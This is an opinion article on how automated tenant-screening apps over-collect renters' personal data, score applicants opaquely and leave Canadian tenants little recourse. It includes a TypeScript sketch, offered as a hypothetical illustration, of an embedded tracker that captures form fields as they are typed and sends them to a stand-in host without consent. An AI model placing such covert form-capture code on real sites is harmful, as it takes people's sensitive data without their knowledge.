A Landlord's Dream and a Tenant's Nightmare
Automated tenant-screening tools offer convenience to landlords while creating serious concerns for prospective tenants
In the not-too-distant past, it was important to be able to look a person in the eye and talk with them to size them up. Do they strike you as genuine? Honest? Trustworthy? Are they someone you could get along with as a colleague? Would they be a responsible tenant?
Meeting someone also gave them a chance to size you up for the same things, and more. And if they were a prospective renter, would they want you as a landlord?
First impressions were important — for people on both sides of a relationship.
But that was then, and this is now, with technological tools replacing human contact in many aspects of daily life.
Automated background-checking and tenant-screening tools have become a landlord’s dream and a renter’s nightmare. Required by an increasing number of landlords across the private and public sectors, these automated evaluation tools use artificial intelligence to streamline the application and vetting process.
Convenient online digital rental application tools facilitate a seamless consent-based exchange of data that helps landlords avoid tenants with unsavory rental histories. Or tenants that another landlord judged to be difficult or high-maintenance. Or those who broke a lease, whether to avoid paying rent or to escape domestic violence. Or those who share a name with someone else who has a criminal history or bad credit.
Many of the automated tools collect a wealth of information that allows landlords to understand, and make assumptions about, far more than prospective tenants may wish to share. For instance, some digital rental apps require biometric data or copies of government-issued photo identification, ostensibly to prevent fraud and misidentification. Others collect information unrelated to tenancy, including details about prospective renters’ dependents and education, how tenants commute to work, and the weight and name of each of their pets. Still other landlords demand that prospective tenants provide the names and birthdays of all family members, copies of driver's licences, and other sensitive information before allowing the applicant to view a residence.
Common among many tenancy-screening apps is the automated scanning of social media accounts to collect personal information that might or might not be relevant to tenancies, including details that landlords are prohibited from requesting under human rights and anti-discrimination laws.
The privacy policies of some apps reveal that prospective tenants’ personal information will be shared with Facebook and advertisers, with no way for individuals to opt out.
Prospective renters are not forewarned that their keystrokes may be monitored or captured as they enter sensitive personal information. Even worse, Facebook “Meta Pixel” trackers embedded in rental apps’ websites can secretly collect personal data entered into forms (e.g., email address, search strings, phone number, name, date of birth, SSN/SIN), automatically transmit it all to Facebook, and associate those details with the applicant’s offline activities, social activities, and other information Facebook has compiled into a detailed profile, regardless of whether the renter has a Facebook account.
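What this looks like under the hood is fairly simple. The sketch below, written in TypeScript, is a minimal hypothetical illustration rather than Meta’s actual Pixel code: it shows how a third-party script embedded in a rental application page could capture form fields as they are typed and forward them to an outside server before the applicant ever presses “submit.” The endpoint, field handling, and hashing step are assumptions for illustration only.

```typescript
// Illustrative sketch only: how an embedded third-party tracker could
// capture form data as it is typed. This is NOT Meta's actual Pixel code;
// the endpoint and field handling are hypothetical.
const TRACKER_ENDPOINT = "https://tracker.example.com/collect"; // hypothetical

async function sha256Hex(value: string): Promise<string> {
  // Trackers often hash identifiers (such as an email address) before
  // sending them, which still allows matching against an existing profile.
  const bytes = new TextEncoder().encode(value.trim().toLowerCase());
  const digest = await crypto.subtle.digest("SHA-256", bytes);
  return Array.from(new Uint8Array(digest))
    .map((b) => b.toString(16).padStart(2, "0"))
    .join("");
}

// Listen to every input on the page, including name, date of birth,
// and SIN/SSN fields, without waiting for the form to be submitted.
document.addEventListener("input", async (event) => {
  const field = event.target as HTMLInputElement;
  if (!field.name || !field.value) return;

  const payload = {
    page: location.href,
    field: field.name,
    value: await sha256Hex(field.value), // hashed, but still linkable
    timestamp: Date.now(),
  };

  // Fire-and-forget beacon to the third-party server; the applicant sees
  // nothing, and no consent dialog is involved.
  navigator.sendBeacon(TRACKER_ENDPOINT, JSON.stringify(payload));
});
```

The hashing step matters: even “anonymized” identifiers sent this way remain linkable to an existing advertising profile held by the third party.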
Algorithms in tenant evaluation apps often use the information gathered from and about the applicant to assign a ‘score’ that reflects the algorithmic prediction of how likely a tenant is to cause damage to property, to be late on their rent (including by reason of actual or implied health or wellness issues that might prevent regular work), or to vacate before the lease expiry date.
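As a purely hypothetical illustration of how such a score might be assembled, the toy function below combines a handful of weighted risk signals into a single number and a pass/fail verdict. The signals, weights, and cutoff are invented for this sketch and do not describe any particular vendor’s model.

```typescript
// Toy illustration of an algorithmic tenant "risk score". The inputs,
// weights, and cutoff are invented; real vendors do not disclose theirs.
interface ApplicantSignals {
  latePaymentsLastYear: number;   // from credit or rental-history data
  priorEvictionFilings: number;   // from court-record scrapes
  monthsAtCurrentJob: number;     // from the application form
  negativeLandlordFlags: number;  // from landlord-entered "feedback"
}

function tenantRiskScore(s: ApplicantSignals): number {
  // Higher score = predicted higher risk of damage, late rent, or early vacancy.
  let score = 0;
  score += 12 * s.latePaymentsLastYear;
  score += 30 * s.priorEvictionFilings;
  score += 8 * s.negativeLandlordFlags;
  score += s.monthsAtCurrentJob < 12 ? 15 : 0; // short job tenure penalized
  return Math.min(100, score);
}

// A landlord-facing dashboard might simply turn the number into a verdict,
// with no explanation the applicant can see or contest.
const verdict =
  tenantRiskScore({
    latePaymentsLastYear: 1,
    priorEvictionFilings: 0,
    monthsAtCurrentJob: 8,
    negativeLandlordFlags: 2,
  }) > 40
    ? "decline"
    : "accept";

console.log(verdict);
```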
Tenant screening apps can also evaluate a property’s “suitability” for a prospective tenant based on an “Analysis of how well the Applicant would fit with the rental property based on the Applicant’s intended use, as stated in their Application.”
The results from tenant screening tools, combined with the ‘feedback’ about tenants that landlords enter into the automated system, are useful for streamlining the rental application process. Tenant rental performance databases that include landlords’ commentaries, made available only to other landlords, can also serve as a blacklist that effectively hampers renters’ ability to qualify for housing.
Given that most tenant-screening tools and the amassed databases are located in the United States, Canadian renters have little recourse to gain access to the information collected about them, to verify its correctness, to know how decisions about them are made, or to have incorrect information corrected. Canada’s public- and private-sector landlords and rental management companies using the automated tenant-screening tools are subject to federal or provincial privacy laws; but an informal survey of government landlord and tenant dispute resolution departments across the country revealed that only one had heard of the technologies, and none had received any complaints about their use or their over-collection of personal information.
As for information being collected with consent, and renters having a choice about whether to use the apps, the sad reality is that a growing number of property owners and rental management companies require prospective tenants to apply through screening apps, so anyone unwilling or unable to apply online has no chance of being considered. Anyone who hopes to rent a property whose landlord or rental agent uses these tools has little real option but to use them, consent to the collection of whatever information the app requires, and submit to whatever demands the landlord makes.
The increased awareness of informal tenant and landlord commentary sites on social media, and of artificial-intelligence-based tools that evaluate and determine suitability for housing, jobs, and other necessaries of life, has spurred lawmakers to craft legislation to regulate the use of artificial intelligence; but preliminary efforts have not yet persuaded technology developers or property owners to correct the privacy-invasive power imbalance that persists.